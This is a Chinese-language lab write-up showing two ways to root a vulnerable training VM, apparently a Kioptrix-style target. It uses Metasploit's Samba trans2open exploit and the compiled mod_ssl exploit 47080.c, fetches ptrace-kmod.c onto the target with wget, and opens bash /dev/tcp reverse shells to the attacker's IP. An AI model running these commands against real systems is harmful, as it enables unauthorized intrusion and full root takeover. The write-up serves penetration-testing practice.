一.第一种方法
将vmx文件中靶机地址网络改为nat模式,然后用VMware打开vmx文件。
- kali linux 命令 ifconfig 查看本机ip
root@kali:~# ip add (ifconfig有时候不管用)
- nmap进行c段扫描 nmap -sP 192.168.122.128/24
- 目标ip192.168.122.133
列出端口并进行端口服务探测 nmap -sV -A -p- -v 192.168.122.133
- Nmap扫描发现139/tcp open netbios-ssn Samba smbd (workgroup: MYGROUP) 采用了samba服务
- 利用msf
(1):搜索smb扫描辅助模块 search smb_version
(2):利用该模块
msf5 > use auxiliary/scanner/smb/smb_version
msf5 auxiliary(scanner/smb/smb_version) >
msf5 auxiliary(scanner/smb/smb_version) > set rhost 192.168.122.133 //设置被攻击目标ip
rhost => 192.168.122.133
msf5 auxiliary(scanner/smb/smb_version) > set rport 139 //设置端口
rport => 139
msf5 auxiliary(scanner/smb/smb_version) > run //运行
(3):发现smb版本 Samba 2.2.1a
(4):Back 命令退出模块
msf5 > search samba //搜索samba漏洞利用模块
- :利用漏洞脚本11 msf5 > use exploit/linux/samba/trans2open
- (6):显示payload并设置
msf5 exploit(linux/samba/trans2open) > show payload
[-] Invalid parameter "payload", use "show -h" for more information
msf5 exploit(linux/samba/trans2open) > show payloads
找到对应payload
(7):利用239就可以
msf5 exploit(linux/samba/trans2open) > set payloadset payload linux/x86/shell_reverse_tcp
payload => linux/x86/shell_reverse_tcp
(8):设置目标ip以及端口
msf5 exploit(linux/samba/trans2open) > set rhost 192.168.122.133
rhost => 192.168.122.133
msf5 exploit(linux/samba/trans2open) > set rport 139
rport => 139
(9):执行命令 run或者exploit
(10):反弹shell
(11):监听2333 端口 nc lvvp 2333
bash -i >& /dev/tcp/192.168.122.128/2333 0>&1 ip为kali主机ip
反弹shell成功
二.第二种方法
1.mod_ssl 版本低,可以利用
(1):搜索漏洞 searchsploit mod_ssl/2.8.4
(2):下载脚本 47080.c
root@kali:~# locate unix/remote/47080.c
/usr/share/exploitdb/exploits/unix/remote/47080.c
(3):将脚本复制到桌面
cp /usr/share/exploitdb/exploits/unix/remote/47080.c ./
(4):编译脚本
root@kali:~# gcc -o exploit 47080.c -lcrypto
47080.c:21:10: fatal error: openssl/ssl.h: 没有那个文件或目录
21 | #include <openssl/ssl.h>
| ^~~~~~~~~~~~~~~
(5):提示报错了,经过百度搜索,发现是缺少了组件,咱们使用apt进行安装
root@kali:~#apt-get install libssl1.0-dev
然后再进行编译
root@kali:~# gcc -o OpenFuck 47080.c -lcrypto
(6): ./OpenFuck 查看OpenFuck 使用方法
发现对应脚本
经测试0x6b可用
使用命令 ./OpenFuck 0x6b 192.168.122.133 -c 40
(7):拿到权限,但不是root权限
(8):错误显示缺少 ptrace-kmod.c 脚本
下载脚本
wget https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c
(9):之后kali主机开启http.Sever服务
python -m SimpleHTTPServer 8000 //由于kali是python2,所以用户这个命令
(10):目标机器下载脚本
wget 192.168.122.128:8000/ptrace-kmod.c
(11):之后重新编译脚本
./OpenFuck 0x6b 192.168.122.133 -c 40
(12):拿到权限
反弹shell
目标机 bash -i >& /dev/tcp/192.168.122.128/2333 0>&1
Kali主机 监听 nc -lvvp 2333
成功拿到root权限。